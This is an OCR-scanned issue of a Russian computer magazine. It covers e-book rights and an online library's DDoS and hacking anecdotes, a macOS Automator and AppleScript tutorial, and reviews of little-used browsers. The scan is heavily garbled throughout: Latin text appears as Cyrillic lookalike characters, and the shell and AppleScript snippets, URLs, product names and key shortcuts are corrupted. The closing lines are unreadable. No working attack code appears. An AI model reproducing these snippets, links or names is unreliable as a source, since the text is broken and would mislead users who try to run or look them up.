книжками, только по-другому. Они не стали гоняться за дру- 
гими библиотеками, не стали тратить безумное количество 
денег. Они выживали за счет тех денег, что приносила им не- 
большая интернет-реклама. В аналогичных условиях они по- 
строили систему, которая работает. Потихоньку она захва- 
тывает мир. Но захватывает с большим трудом и скрипом, 
потому что торговать книгами до сих пор безумно тяжело. 

Представьте, что вы хотите торговать книжками. Чтобы 
у вас хорошо покупали, у вас должны быть все книжки на свете. 
Абсолютно все. Но чтобы собрать все книги, нужно заключить 
договоры со всеми авторами мира. Что им предложить? «Да- 
вай мы заключим с тобой договор, и я буду торговать твоими 
книжками»? 

Хорошо, допустим, автор соглашается, но говорит: 
«покажи мне хотя бы сто баксов». Берем 20 тысяч писателей, 
умножаем на сто баксов, и получается не очень симпатичная 
сумма. Причем 20 тысяч — это только современные писатели. 
Есть еще миллион умерших писателей, после которых тоже 
остались авторские права, где-то там. Ими тоже нужно торго- 
вать, но заключить договор на их книги еще сложнее, потому 
что права закопаны черт знает где, перепроданы и принадле- 
жат внучатому племяннику внука от третьего брака. 

Существует и другой вариант. Скажем, ты все же собрал 
денег, продал книжек, заработал лично себе на карман, но те- 
перь нужно заплатить долю авторам. Хорошо, если у тебя все- 
го десяток авторов, — ты просто отстегнул каждому. Условно 
говоря — заработал миллион, отдал на авторские права треть. 
Раздал эту треть десяти авторам, и у них получилось порядка 
тридцати тысяч на брата. 

Но если делить не на десятерых, а на десять тысяч ав- 
торов? Каждому достанется по три бакса. Масса авторов ска- 
жет: «зачем мне эти три бакса? Что сейчас я торгую книгой за 
три бакса, что я бесплатно ее раскидаю... Пусть я ничего не 
получу, зато меня прочтут в пятьдесят раз больше людей». Это 
очень серьезное пороговое решение. Этот порог очень тяжело 
переступить. Литресовская практика такова: они сперва нача- 
ли платить авторам, приманивать к себе, потом стали зараба- 
тывать, потом опять платили... Этот плавный рост потихонечку 
работает, но до полного и тотального успеха им еще очень да- 
леко. Авторы моментально захотели денег, причем все сразу, а 
заработать денег для всех сразу «ЛитРес», увы, не может. 

Собрать все права вместе — невозможно. Точнее, воз- 
можно, но нужно очень много денег. А денег либо нет, либо они 
есть, но их мало. 

Сейчас все издательства, которые печатают книги 
на бумаге, включают в договор права и на электронную 



копию книги. Издательства становятся держателями уже 
электронных прав и получают возможность торговать ими. 
А дальше у кого как — некоторые сливают эти права в интер- 
нет-магазины, некоторые создают свои интернет-магазины, 
кто-то пытается крутиться иначе. 

Авторы почти всей современной издающейся литера- 
туры уже прошляпили и потеряли права на нее (именно 
на электронные версии). Права не в руках авторов, они 
улетели в зрительный зал. К кому-то. И этот кто-то аккуму- 
лирует их, пытается коммерчески использовать. Авторам за 
это платят, но опять же — если за бумажную книжку автор 
получает несколько сотен или тысяч долларов, то за цифру 
он получает несколько долларов, ну, может быть, несколько 
десятков или сотен долларов. Топовый автор — несколько 
тысяч долларов в год. 

Ситуация с эксклюзивными правами тоже плоха: 90% 
авторов, отдав свои эксклюзивные права, ничего от этой 
отдачи не получают. Или получают несколько сотен рублей в 
год. Негатив, который направлен против достаточно успешных 
интернет-магазинов, крутится как раз вокруг этого. «Я подпи- 
сал договор, отдал права, а деньги где?!» Встаньте на сторону 
магазина — твою книжку продали 30 раз. Вот тебе деньги за 
30 твоих книжек. Да, вот ту книгу мы продали 580 раз, но тебя 
только 30. И что будешь делать в такой ситуации? 

Невозможно накормить литературой больше сотни 
писателей. Во всей нашей стране денежных ресурсов — на 
100-1000 писателей, а их 30 тысяч. Получается, что всегда 
кто-то будет работать даже не за гроши, а за копейку в год. И 
конечно, такие авторы подрывают монополию торговли, по- 
тому что многие из них готовы работать бесплатно, просто за 
интерес, за то, чтобы их читали. Конечно, они тоже мечтают, 
что их будут продавать, но когда их действительно начинают 
продавать, они получают пять баксов в год и как-то... обижа- 
ются. В том числе и на «ЛитРес». ^ 
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МЕГАБАЙТ — 
ОБЪЕМ КНИЖЕК 
В РУНЕТЕ НА 
МОМЕНТ ПОЯВ- 
ЛЕНИЯ ив.во в 
1994 ГОДУ 
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ТЫСЯЧ ЧИТА- 
ТЕЛЕЙ В ГОД 
ИМЕЮТ ЛИДЕРЫ 
«САМИЗДАТА» 



0003 и взломы 

ООоЗ у нас был. Нагрузка была в семьдесят раз больше обычной, 100 мегабит. 

Запросы выглядели так: «гетоѵе ІІтаІ 8ІііЪ> и дальше шел адрес странички какого-то му- 
зыкального графомана (такие у нас тоже есть). Как я понимаю, дело было в том, что один 
рэпер поссорился с другим и ООоЗ’ил меня с требованием удалить музыкальную страницу 
этого несчастного. Что делать, пришлось уступить грубой силе, страницу я все-таки удалил :). 

Была и пара взломов. Как-то раз мы проводили голосование на лучшую фантастиче- 
скую книжку какого-то года и для этого установили модуль НТТР5. Как ни странно, он-то и 
оказался самым дырявым, сквозь него мне хакнули сервер. Дефейса, насколько я помню, 
не было. На сервере около 40 сайтов, взломали только один. Если и был дефейс, то де- 
фейс этой НТТР8-голосовалки, одной из сорока. 

Зато я помню, что в 2000 году сломали ^еп^а.^и и на дефейсе было сообщение — 
человек искал работу в компьютерной безопасности. Мол, возьмите меня на работу, во- 
круг такие лохи. Правда, не знаю, приняли его в итоге на работу или нет. 

Здесь стоит учитывать, что весь софт у меня самопальный. Стандартные ломалки 
к нему не подходят. Да, нестандартные — самописные наверняка в состоянии что-нибудь 
ломануть, но с этим я уже ничего поделать не могу. 
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Ргеѵіеѵѵ 



КАК ПРОДАВАТЬ ДРУЗЕЙ 



ВКонтакте — зло? Группы со «смешными» 
картинками и бесконечными обсуждениями по- 
литики и всякого треша — беспросветный бред 
и тошняк? Просто ты не умеешь на всем этом за- 
рабатывать. Паблики — отличный способ начать 
делать деньги на рекламе, занимаясь при этом 
интересными вещами. Для кого-то это может 
оказаться ценнейшим опытом первого настоя- 
щего проекта. Нужно продумывать все до ме- 
лочей — оформление, продвижение, работу 
с пользователями и администрацией ВКонтакте. 
Слишком сложно о, казалось бы, чем-то про- 
стом? Читай нашу инструкцию. 
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ПОДНИМИТЕ МНЕ ВЕКИ 

Поговорим об Аиіотаіог и АррІеЗсгірІ — это 
мощнейшие инструменты, которые позволяют 
твоему любимому Мае делать максимум работы 
за тебя. 



БУНТАРИ БЕЗ ПРИЧИНЫ 

Самые странные, оригинальные и бесполез- 
ные браузеры. Мы не думаем, что кто-то будет 
этим пользоваться. Просто интересно потыкать 
палочкой. 



ОТСТУПЛЕНИЕ ДЕСКТОПОВ 

Если тебе нравится читать и смотреть кино 
на твоем планшете, тебе наверняка придется 
по вкусу использовать его для всего остального. 
Но для этого нужен правильный набор ПО. 




ЧЕРЕЗ ЭМУЛЯЦИЮ К ЗВЕЗДАМ 

Сетевая природа ІІМІХ позволяет делать мно- 
жество интересных вещей в домашней сети. 
Как ты сможешь убедиться сам, расшарить 
удается любое устройство. 



АТАКА НА РОУТЕР 

Исследуем уязвимость в прошивке популярного 
ѴѴі-Рі-маршрутизатора ІуХЕЕ Кеепеііс. Речь идет 
о дырке, позволяющей получить удаленный 
доступ. 




САМЫЙ БЫСТРЫЙ АНТИВИРУС 

Продолжаем поиски самого лучщего авера. 

На этот раз мы провели максимально тщатель- 
ный тест скорости почти всех популярных про- 
дуктов на рынке. 
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Михаил Еловских 

ѵѵгопоІіпк@отаіІ.сот 



Как заставить Мак 
работать за тебя 
с помощью АиІотаШ 
и АррІеВсгірІ 



ПОДНИМИТЕ 
МНЕ ВЕКИ 



Современные операционные системы 
предлагают довольно большой набор 
различных встроенных инструментов 
и настроек, позволяющих более гибко 
организовать работу, избегая раз- 
личных рутинных операций. Но все 
равно найдется еще тысяча мелких 
действий, которые не были учтены 
разработчиками. И тут на помощь нам 
приходят множественные скриптовые 
языки, в которых зачастую проблема 
решается на раз-два-три. Но сегодня 
мы рассмотрим еще одно решение 
с несколько иным подходом, на случай 
если, например, в программе не пред- 
усмотрен консольный режим. Этим 
решением является программа, вхо- 
дящая в состав стандартной поставки 
08 X под названием Аиіотаіог. 
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ГоІсІ«г Асііоп 




Саіслбаг Аіагш 



Автоматор позволяет легко и быстро создавать 
ѵл/огк^Іоѵѵ — по сути, скрипты, которые могут прекрасно 
интегрироваться с операционной системой. Отличие 
от традиционных ЬазИ-, РуІРоп-, Ыа- и прочих скрип- 
тов в том, что вместо традиционного подхода с напи- 
санием кода ты в графическом виде собираешь скрипт 
из маленьких кирпичиков — событий и действий. 
В стандартной библиотеке этих базовых компонентов 
достаточно для различных случаев жизни, а если необ- 
ходимо, можно ее существенно расширить, установив 
пакеты дополнений. Впрочем, обо всем по порядку. 

При создании нового скрипта автоматор спросит 
о его типе. На выбор предлагается: 

• ѴіогМІоѵі — стандартный файл, запускаемый 
либо из 61)1 автоматора, либо через консоль ко- 
мандой аиіотаіог. 

• Арріісаііоп — воркфлоу, оформленный в виде от- 
дельного приложения. Его можно запустить, не за- 
ходя в 61)1. 

• Зегѵісе — специальный тип, позволяющий запу- 
скать скрипты в контексте приложений. После соз- 
дания они будут доступны в пункте меню Вегѵісез. 

• Ргіпі РІидіп — эти воркфлоу будут доступны в ди- 
алоге выбора принтера. Они принимают на вход 
РОР-версию печатаемого документа. 

• Роісіег Асііоп — привязываются к определенной 
папке и запускаются при добавлении файлов в эту 
папку. 

• Саіепсіаг АІагт — скрипты запускаются по опре- 
деленному событию в календаре. 

• Ітаде Саріиге РІидіп — интеграция с сервисом 
захвата изображения. ѴѴогк^Іоѵѵ получает на вход 
изображение. 




Ітаде Саршге 
РІидіп 



В статье мы рассмотрим несколько довольно инте- 
ресных юз-кейсов, которые могут пригодиться любо- 
му пользователю 08 X или подтолкнут читателей на на- 
писание новых рецептов. 
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ОБЪЕДИНЕНИЕ 
НЕСКОЛЬКИХ РОР-ФАЙЛОВ 

В стандартной библиотеке автоматора 
есть ряд действий с РОР-документами. 
Что ж, оформим небольшой воркфлоу, 
который позволит в будущем объединять 
несколько отдельных файлов в один. 

Оформим его в виде отдельного при- 
ложения, выбрав соответствующий тип 
в первом диалоге автоматора. Далее по- 
следовательно перетащим в наш скрипт 
такие действия: Азк Іог Ріпсіег Ііетз — 
диалог выбора файлов, СогпЬіпе РОР 
Радез — собственно действие компо- 
новки в один файл и Моѵе Ріпсіег Ііетз — 
действие, сохраняющее полученный 
РОР-файл в указанную папку. 

Вот и все, можно запустить скрипт, 
нажав на кнопку «Рип» в правом верхнем 
углу окна автоматора. 
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Довольно продвинутые ресурсы, 
на которых собрано большое количе- 
ство материала по автомотору: 
ѵѵш/.аи!ота!ебѵѵогк!Іоѵѵ5.сот 
аи^отаіог.из 

ѵѵѵѵѵѵ.тасозхаціотабоп.сот 

Также есть твиттер робота Отто (пер- 
сонажа из логотипа автоматора): 

ІІІ1 1 ) г, ; , ; I \уі!І е г .сопі /МАС А УТОМАТІОМ 



( Рассмотрим несколько интересных юз-кейсов, которые могут пригодиться 
любому пользователю 05 X или подтолкнут его на написание новых рецептов 



ГоІРег Ас^іоп гес«іѵ«& Л1е$ апд (о1(1ег$ а(1(1е<і (о | ^ Р»>к<оо 





ШАРИНГСКРИНШОТОВ ^ 

Этот рецепт позволит тебе автоматом синхронизировать и расщаривать 
скриншоты, которые ты делаешь. В 05 X уже встроены механизмы снятия 
скриншота (сочетания клавиш <Стс1 + ЗНій + 3> для снятия снимка со всего 
экрана и <Стс1 + ЗІііЙ + 4> для снимка области экрана или окна приложения). 
Также функции синхронизации присутствуют во многих облачных хранили- 
щах, например ОгорЬох. Поэтому нам остается только немного их подружить. 

Создадим новый воркфлоу с типом Роібег Асііоп. Необходимо будет вы- 
брать папку, в которую макось сохраняет скриншоты (по умолчанию эта пап- 
ка — '/Оезкіор). Как только в папку будет добавляться какой-либо файл, бу- 
дет вызываться наш воркфлоу, поэтому создадим фильтр, чтобы исключить 
расшаривание остальных файлов. Для этого добавим действие РіІІег Ріпсіег 
Ііетз. По умолчанию все снимаемые скриншоты называются следующим 
образом «Зсгееп ЗИоІ [дата] аі [время]. рпд», поэтому зададим в фильтре 
поля: Мате Ьедіпз ѵѵіШ “Зсгееп ЗІіоѴ’, а также: КіпсІ із ітаде. Если необходи- 
мо, то ты можешь еще добавить другие параметры, например дату создания, 
чтобы не трогать старые скриншоты, находящиеся на рабочем столе. 

Теперь добавим действие Моѵе Ріпсіег 1!етз, которое будет перемещать 
картинки в соответствующую директорию /ОгорЬох/РиЫіс/. И теперь до- 

бавим небольшой хинт, который будет копировать ІІРЕ расшаренного скрин- 
шота в буфер обмена. Для этого добавим действие Рип ЗИеІІ Зсгірі и добавим 
в него следующее содержание: 

сотЬіпесІ= ■■ (іТТр5 : //с^ сі горЬох . сот/ и/ [ изег_ісІ ] / " $ ( Ьа зепате $1 ) 
Ііпа1='есЬо $сотЬіпесІ 1 зесі 'з/ /%20/ё’' 
есЬо -пе ${Япа1} | рЬсору 
а-рріау /5узТет/1_іЬгагу/5оипсІз/Него . аі-р-р 

Заметь, что вместо [изег_ісІ] тебе нужно будет подставить свой идентифи- 
катор из семи цифр в Дропбоксе. Как его найти? Самый простой вариант — 
зайти залогиненным на сайт Дропбокса и в яваскриптовой консоли браузера 
набрать: 

сопзо1е.1о§(Сопз-1:ап1:з.иісІ) 

Опционально можно еще добавить нотификэйшн. Тут возможно два вари- 
анта: либо использовать действие, которое идет вместе с СгоѵѵГом, либо ска- 
чать и установить бесплатное действие, позволяющее показывать уведомле- 
ния в теперь уже стандартном центре уведомлений 03 X ( із.осІ/тддРго) . 

Готово. Теперь сохраняем наш воркфлоу (автоматор положит его 
в -/иЬгагу/ѴѴогкТІоѵѵз/АррІісаІіопз/РоІсІег Асііопз/) и наслаждаемся работой. 
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<іо 8НеіІ 8СГІРІ '(іеГаикз ѵѵгііе ~/иЬгагу/РгеГегвпсв8/ВуНозѴ 
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00 мот оізтинв по календарю 

в последней версии операционки от Арріе был представлен новый 
центр сообщений с возможностью отключения всплывающих аллертов 
до определенного времени. Эта функция получила название Оо Моі 
ОізІигЬ. Она позволяет до конца текущего дня отключить все отвлека- 
ющие факторы. Но что, если ты хочешь, чтобы эта функция включалась 
по расписанию? Например, в конце каждого твоего рабочего дня и в вы- 
ходные. Почему-то ребятам в Купертино это не пришло в голову. Этот 
воркфлоу придет тебе на помощь. 

Для начала создадим новый Саіепбаг ѴѴогкТІоѵѵ, так как мы хотим уже 
потом в календаре настроить расписание запуска нашего скрипта. 

Добавим действие Рип АррІеЗсгірІ и в поле скрипта заменим следу- 
ющим содержанием: 

сіо зЬеІІ 5Сгір:Ь "сІе-Раи11:5 и/гііе ~/ІіЬгагу/-* 

Рге-Регепсе5/ВуНо5І;/сот . арріе . по1:і^са1:іопсеп1:егиі ..е 

*.р1І5-І: с1оNо■^:^і51:игЬ -Ьоріеап ■Ьгие" 

Беі 1;ІіеРа1:е фо яиоііесі -Рогт о-Р (сІо зііеіі 5сгір1.«-' 

"сіаіе +\’’%У-%т-%с1 %1:%М:%5 +0000\"") 

СІО 5Ье11 5сгір1: "сІе-Раи11:5 ѵ»/гі1:е ~/ІіЬгагу/^ 

Рге-Регепсе5/ВуНо5І:/сот . арріе . поіірісаіііопсеп-ііегиі . е 

*.р1І5І: сІоЫо-1:0І5І:игЬ0а1:е -сіа1;е " & фРіеОаІіе 

СІО зЬеІІ зсгір'Ь "кіііаіі Nо■1іР^са■^;іопСеп■^:ег" 

Скрипт пишет в настройки центра уведомлений о включении ОМО, а по- 
том перезапускает его, чтобы новые настройки возымели эффект. 

Готово, теперь сохраняем наш воркфлоу. Автоматор сам поместит 
его в нужное место на диске для данного типа, -/І-іЬгагу/ѴѴогкРІоѵѵз/ 
Арріісаііопз/Саіепсіаг, запустит приложение Саіепсіаг и создаст в нем 
событие, в котором уже можно будет настроить время запуска, перио- 
дичность и так далее. Сохраняем событие и радуемся тишине и спокой- 
ствию в нужные часы. 

Кстати, если тебе нужен аналогичный скрипт, который, наоборот, 
отключает ОМО, то придется создать второй воркфлоу, такого же типа, 
но со следующим скриптом: 

СІО зИеІІ зсгірі: "сіе-раиіііз іл/гі1:е ~/ІіЬгагу/^ 
Рге-Регепсез/ВуНозІ:/ сот, арріе. по1іІіса1:іопсеп1егиі.»-і 

*.р1І5І: сIрNо1:^І51:игЬ -Ьооіеап -Раізе" 

1:гу 

СІО зііеіі зсгірі: "сІе-РаиІІіз сіеіеііе -/ІіЬгагу/^ 1 

Рге-Регепсез/ВуНозІі/сот. арріе. по1:ійсафіопсеп1:егиі.— 

*.р1і5І: сIоNо1:^І5■^:игЬ^а1:е" 
епсі ігу 

сіо зІіеІІ зсгірі: "кіііаіі Мо1:і1іса'І:іопСеп1:ег" 

После этого также необходимо будет настроить расписание его 
включения. 



ЗАКЛЮЧЕНИЕ 

На протяжении последних нескольких статей я наглядно показывал тебе, 
что если ты все еще думаешь, что 08 X — это гламурно и бестолково, то 
ты ошибаешься. В этой системе есть куча инструментов, позволяющих 
избавиться от рутинных действий и наслаждаться тем, как все проис- 
ходит словно по взмаху волшебной палочки. И было бы глупо игнори- 
ровать возможности, которые предлагают различные разработчики. ІЕ 



РОРСЫР и АІРРЕО 



Помимо автоматрра, пользователям 08 X доступны и другие 
средства автоматизации. Одно из них — РорСІір, небольшое 
приложение, позволяющее производить различные манипу- 
ляции с выделенным текстом, второе — АІГгесІ, приложение, 
функциональностью напоминающее стандартный ЗроІІідЫ, 
с кучей различных дополнений, позволяющих переключать 
музыку в іТипез, выдавать результат поиска в ѴѴоІ^гат АІрЬа или 
писать простенький Тѳ-Оо-список. 



РОРСЫР 

Сайт программы: рііоіітюоп.сот/рорсіір 

РорСІір — утилита платная, но стоит всего 4,99 доллара. Впрочем, 
попробовать ее можно бесплатно, с ограничением на 150 запусков. 
После установки в системе и запуска программы, при выделении 
текста будет появляться небольшой рор-ир, позволяющий произве- 
сти различные операции с выделением, подобно тому как это про- 
исходит с редактируемым текстом в Ю8. По умолчанию это поиск 
выделенного текста в Соодіе, стандартные операции: вырезать, ко- 
пировать, вставить, а также, если было выделено одно слово, поиск 
его значения в словаре. 

Но вся мощь РорСІір кроется в множественных и качественных 
его дополнениях ( рііоітооп.сот/рорс іі р/ехіепзіо пз). Там есть и пе- 
реводы выделения в верхний регистр, и шаринг ссылки через Огоріг, 
и создание твита. Кроме того, без лишних сложностей ты можешь 
дополнить библиотеку расширений чем-то самописным, набросав 
скрипт на любимом ЯП и оформив его в виде экстеншна. Подроб- 
ности по оформлению и примеры можно найти в гитхабе проекта 
гі^ІоІгпроп/РорСІір-ЕхІ епзіопз ). Ок 
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АІРНЕО 

Сайт программы: ѵ\л/ѵѵѵ.аІ1гесІарр.сот 

Альфред доступен в двух вариантах: простом и расширенном. 
Первый распространяется бесплатно, второй можно приобрести 
за 15 фунтов стерлингов. Программа реализована в виде небольшо- 
го всплывающего окна с текстовым поисковым полем, появляющего- 
ся по нажатию хоткея (по умолчанию — <А11 + 8расе>). По мере вво- 
да символов в текстовое поле альфред, подобно 8ро1і1у, подбирает 
релевантные варианты (поиск приложений, файлов, подсчет мате- 
матического выражения...). Роѵѵеграск добавляет целый ряд полез- 
ных возможностей, позволяющих, например, проиграть найденный 
альбом (если по запросу были найдены музыкальные треки) в іТипез, 
отправить найденные файлы по е-таіі, а также подключить различ- 
ные экстеншны, написанные на зІіеІІ, АррІе8сгір1, а также ѵѵогкЛоѵѵ 
автоматора. На сайте разработчиков есть специальный раздел, по- 
священный дополнениям ( зиррогі.аіігесіарр.сот/ехіепзіопз ). 
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Начальная страница Адммка Бг 



Лучшие интернет-браузеры, 
которыми никто не пользуется 



Создать новый браузер сегодня как никогда 
просто — есть Сбготіит, который можно фор- 
кнуть и добавить любой функционал. Компании 
делают это по той же логике, по какой когда-то 
создавались тулбары, — это всего лишь попыт- 
ка вбить свой бренд пользователю и заставить 
его приобретать другие продукты компании. 

Но когда это делают независимые разработчи- 
ки, продукт преследует цель сказать свое «му» 
на фактически статичном рынке браузеров. 

Не подумай — я не верю, что ты перейдешь 
на один из инди-браузеров. Но посмотреть, 
что они предлагают, интересно, не так ли? 



ПЕРЕХОДИТЬ ИЛИ НЕТ? 

Когда кажется, будто в какой-то обла- 
сти уже сказано все, что только можно, 
попытки сделать что-то по-другому за- 
хватывают дух: сперва думаешь — это 
дикость и утопия, но в результате ты на- 
чинаешь по-новому смотреть на лидеров 
рынка. По этой же причине в декабрь- 
ском номере ][ мы говорили о таких 
«странных» мобильных ОС, как Тігеп, 
Ріге^ох 05 или Маето. Поэтому, на мой 
взгляд, когда рассуждаешь об альтерна- 
тивных браузерах, некорректно ставить 
вопрос ребром: переходить или нет. Нет, 
ты однозначно не перейдешь. Но можно 
попробовать повторить заинтересовав- 
ший функционал в твоем любимом бра- 
узере — для этого в каждом случае я по- 
старался подобрать соответствующие 
расширения. 
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Идея создания браузера, тесно взаимодействующего с по- 
пулярными социальными сетями, давно будоражит умы раз- 
работчиков. Попыток создать подобный комбайн было много, 
но, пожалуй, лучше справилась компания ВосктеІІ. Недаром 
они смогли получить серьезные финансовые инвестиции. 

Одноименный проект был запущен в 2009-м и сразу зару- 
чился поддержкой одного из основателей компании Меізсаре. 
Год спустя была выпущена первая бета-версия, построенная 
на исходниках С^іготіит, за короткое время она успела собрать 
приличное количество фанатов. Основной фишкой РосктеІІ 
стала ненавязчивость. Интеграция с РасеЬоок и ТѵѵіПег реали- 
зовывалась как добавочная функциональность, а не назойли- 
вое дополнение. 

Возможно, ВосктеІІ ждало светлое будущее, но в 2012 году 
разработчики свернули десктопную версию и сосредоточились 
на создании приложения для Ю5. Несмотря на резкие переме- 
ны, мобильное приложение родилось быстро и получилось до- 
статочно любопытным. 

Итак, нам предлагают решение, интересное в первую оче- 
редь интерфейсом. Управление браузером сосредотачивается 
вокруг единственной строки ввода. Она одновременно являет- 
ся адресной строкой и навигатором по различным группам кон- 
тента. Например, ты можешь выбрать определенную тематику 
и сразу получить пачку превьюшек новых постов, ей соответ- 
ствующих. Наличие дополнительных жестов позволяет выпол- 
нять ряд операций (расшаривание, лайки) одним кликом или 
взмахом. 

Таким образом, вместе с браузером мы получаем генера- 
тор контента. При этом у нас есть возможность довольно легко 
влиять на условия выдачи материалов. Достаточно лишь зайти 
на любой сайт и кликнуть по пимпе «РоІІоѵѵ». Ресурс добавля- 
ется в список наблюдаемых (учитывается П88-лента), и новые 
материалы будут попадать в персональную новостную ленту. 

Вердикт: мания к социальным сетям оказалась заметно пере- 
оценена, и браузер специально для социалок оказался не вос- 
требован. Тем не менее эти функции уже переняли разрабы 
Рігеі^ох. 

Расширения: 

• Генератор контента. Плагин для (Зоодіе 
СРготе: РеесІІѵ ( ооо.оІ/ОѴ\/Р26 ): 

• Новые материалы по категориям. 

Плагин для Соодіе СМготе: 

81итЫеироп ( аоо.аІ/ОѴѴРгб ): 

• Взаимодействие с социальными сетями 
(публикации, шаринг и так далее). Плагин 
для Ооодіе СИготе: Ви^ег ( аоо.а1/АРих8 Т 
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Сотосіо Огадоп 

(ЩШШЩі) - браузер, по- 
строенный на базе СИготіит 
и обладающий дополнитель- 
ными секьюрными фишками: упрощен- 
ной идентификацией 881-сертификатов, 
повышенной защитой конфиденциаль- 
ных данных; собственным надежным 
□М8-сервисом; блокировкой соокіез при 
работе в режиме инкогнито. 




Сотосіо ІсеОгадоп 

(ШШШМ-'І-тоже 

самое, что и предыдущий, 
только на базе РігеТох. 



ЗеаМопкеу 

— идейное 
продолжение некогда по- 
пулярного пакета программ 
МогіІІа 8иі1е. Включает в себя браузер 
надвижке Оеско, почтовый клиент, ІРС- 
клиент, адресную книгу и так далее. 




^^Сатіпо 

(ірЮ ТШк Ш) — браузер 
на базе Рігеіох для 08 X. 

_ Выделяется родным для 08 
X интерфейсом (Сосоа) и поддержкой 
различных технологий, специфичных 
для платформы (8роІІідМ, Ріпсіег, Ооск, 
КеусИаіп и других). 



ОоІрНіп 

— браузер 
для мобильных платформ 
(Ю8, АпбгоісІ). Из наиболее 



интересных возможностей: голосовой 
поиск, расшаривание контента в один 
клик, взаимодействие с популярными 
сервисами Еѵегпоіе и ОгорЬох, синхро- 
низация с десктопными браузерами. 



РІОСк 

— основан на 
базе СЬготіит и ориенти- 
рован на пользователей, 
активно тусующихся в социальных сетях 
(Тѵѵійег, РасеЬоок, РІіскг, ЫпкесІІп и про- 
чие). Последняя версия датирована фев- 
ралем 2011-го, и в настоящий момент 
с официального сайта ничего нельзя 
скачать. Ходят слухи, что разработчики 
трудятся над принципиально новым 
решением. 





Яндекс.Браузер 

— браузер, 

созданный на базе СІіготіит 
в недрах компании «Яндекс». 
Выделяется полностью переработанным 
интерфейсом, наличием турборежима 
(технология ОрегаТигЬо), повышенной 
безопасностью и поддержкой взаимо- 
действия с сервисами компании (напри- 
мер, Яндекс.Диск). 



г 



8ПѴѴАПЕІПОМ 

\ллллл/.5гѵѵаге.пе1 

Аудитория проекта: 

любители теории заговора 



Первые релизы Ооодіе СПготе (впрочем, как и СНготіит) наделали много 
шума. Пользователи обратили внимание не только на интересный интерфейс 
и скорость работы, но и на пару пунктов лицензионного соглашения, нанося- 
щих удар по приватности. 

После этого начался бум статей на тему «Большой брат следит за тобой», 
в итоге вынудивший (Зоодіе переосмыслить свои амбиции. Несмотря на это, 
в СІіготе до сих пор присутствует несколько функций, так или иначе наруша- 
ющих личное пространство пользователя. 

Например, всем известно, что сразу после установки (Зоодіе СІіготе ге- 
нерирует уникальный идентификатор, который передается на сервер ком- 
пании. Функция «предложения» действует аналогичным образом. Все вво- 
димые данные отправляются в Ооодіе с целью выдачи предложений поиска. 
Примерно в таком же ключе идет рассуждение о других кошмарах: фоновой 
службе обновлений, отправке отчетов с ошибками и прочем. 

Решить все озвученные проблемы готов 8РѴ\/аге. По факту это тот же 
Ооодіе СИготе, но с отсеченным языком. Никакую информацию на сервер 
Ооодіе он не передает, а еще приносит несколько приятных фишек: 

• автономный инсталлятор; 

• встроенный блокировщик рекламы; 

• возможность изменения ІІзег-АдепІ. 

Вердикт: решение в первую очередь для приверженцев теории заговора. 
Дополнительных функций у браузера немного, и все они реализуются при по- 
мощи соответствующих расширений. В итоге получается, что все преимуще- 
ства сводятся лишь к обеспечению дополнительного уровня приватности. 




5КѴѴаге — это тот же Соодіе СНготе, но с отсеченным языком. Никакую инфор- 
мацию на сервер Соодіе он не передает, а еще приносит пару приятных фишек 
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СООІМОѴО 

сооіпоѵо.сот 

Аудитория проекта: 

веб-разработчики, энтузиасты 



Сколько же 
уже можно 
клонировать 
СНготіит? 



Еще один проект, выросший из форка Сбготіит, СооІМоѵо выгодно отли- 
чается от подобных альтернатив. Во-первых, разработчики из Поднебесной 
ставят перед собой масштабные цели, а не просто создают очередной клон 
с парой-тройкой дополнительных расширений. Во-вторых, они позициони- 
руют свое решение в качестве полноценной замены Соодіе СИготе. Идея 
такого решения успела завоевать сердца пользователей, а сам браузер по- 
лучил ряд наград. 

Одна из самых интересных и полезных функций — ІЕ ТаЬ. Моя основная 
деятельность отчасти связана с разработкой веб-приложений, а это подраз- 
умевает необходимость тестирования, правильно ли отображается верстка 
в браузерах, использующих для рендеринга разные движки. ІЕ ТаЬ упрощает 
процесс тестирования в Іпіегпеі Ехріогег. Она избавляет от необходимости за- 
пускать отдельную копию ІЕ, а позволяет одним кликом сменить движок, ис- 
пользуемый для рендинга. 

Отдельного внимания также заслуживает управление жестами. В свое 
время я привык пользоваться подобной функциональностью в Орега, и надо 
сказать, что в СооІМоѵо реализация выполнена не хуже. 

О неприкосновенности личного пространства разработчики придержива- 
ются тех же взглядов, что и ребята из проекта 5ВѴ\/аге Ігоп. Все тайные пере- 
сылки информации на серверы компании срезаны под корень. 

Из других наиболее интересных функций стоит отметить: 

• мгновенный перевод страниц на другие языки 
(посредством Ооодіе Тгапзіа^е); 

• создание скриншотов страницы или выделенной области; 

• быструю очистку истории; 

• отдельный сайд-бар для размещения часто 
используемых виджетов и расширений; 

• блокировщик рекламы. 

Вердикт: СооІМоѵо был долгое время лидером среди альтернативных 
сборок на базе СЬготіит. Сегодня он продолжает держать позиции и по- 
прежнему остается хорошим решением для пользователей, желающих из ко- 
робки получить прокачанный браузер. Огорчает лишь, что в последнее время 
СооІМоѵо стал реже обновляться. Если так пойдет дальше, то рано или поздно 
конкурент в лице СЬготе выкинет его с дистанции. 

Расширения: 

• Быстрая и гибкая очистка истории, соокіез и других файлов сетевой 
активности. Плагин для Соодіе СЬготе: СІіск&СІеап ( аоо.оІ/КЕтѴв ): 

• Сокращалка ссылок. Плагин для Соодіе СЬготе: 
доо.ді ипі ЗЬоПепег ( ооо.оІЛоШЦ : 

• Управление жестами. Плагин для Соодіе СЬготе: СгхМоизе 
( аоо.аІ/02РѵС ) или Сезіигез !ог СЬготе ( ооо.оІ/РхОРд ): 

• Режим для чтения (без отображения картинок и лишних элементов 
верстки). Плагин для Соодіе СЬготе: іВеасІег ( ооо.оІ/РсУІП 

или СІеагІу ( аоо.о1/81гтк ): 

• Кнопка для быстрой подписки на В83. Плагин для Соодіе СЬготе: 

ВЗЗ ЗиЬзсгірІіоп Ехіепзіоп ( ооо.аІ/тАРсІѵ ^: 

• Суперперетаскивание. Плагин для Соодіе СЬготе: 

Зирег Огад ( ооо.оІ/хоАгР ): 

• Переводчик. Плагин для Соодіе СЬготе: 

Соодіе Тгапзіаіе ( аоо.а1/Ц2Е42 ). 




* ’ѵ Нх»в« >клим п 



I »ѵѵллгмІсер.ги 'рс^:/ 60178/ 

ііа >ту 5*кмідкм к которым котите ие 



! $уѵі(с1з Кетеі 




{ 1 ^ СЬ(0«пеМо<1е 


1 



; КГ.4о<>с 

Ор«п Нж иь ил(*і К кете* 



Н)ИЯ копирастии китлмгм» 

собо»е«ностк изиенял» мир ■ --т. 
д*9им оруки«. А потом компыотерм юмомили его 
«3. В результате иителлектуальиал собствемносгь 
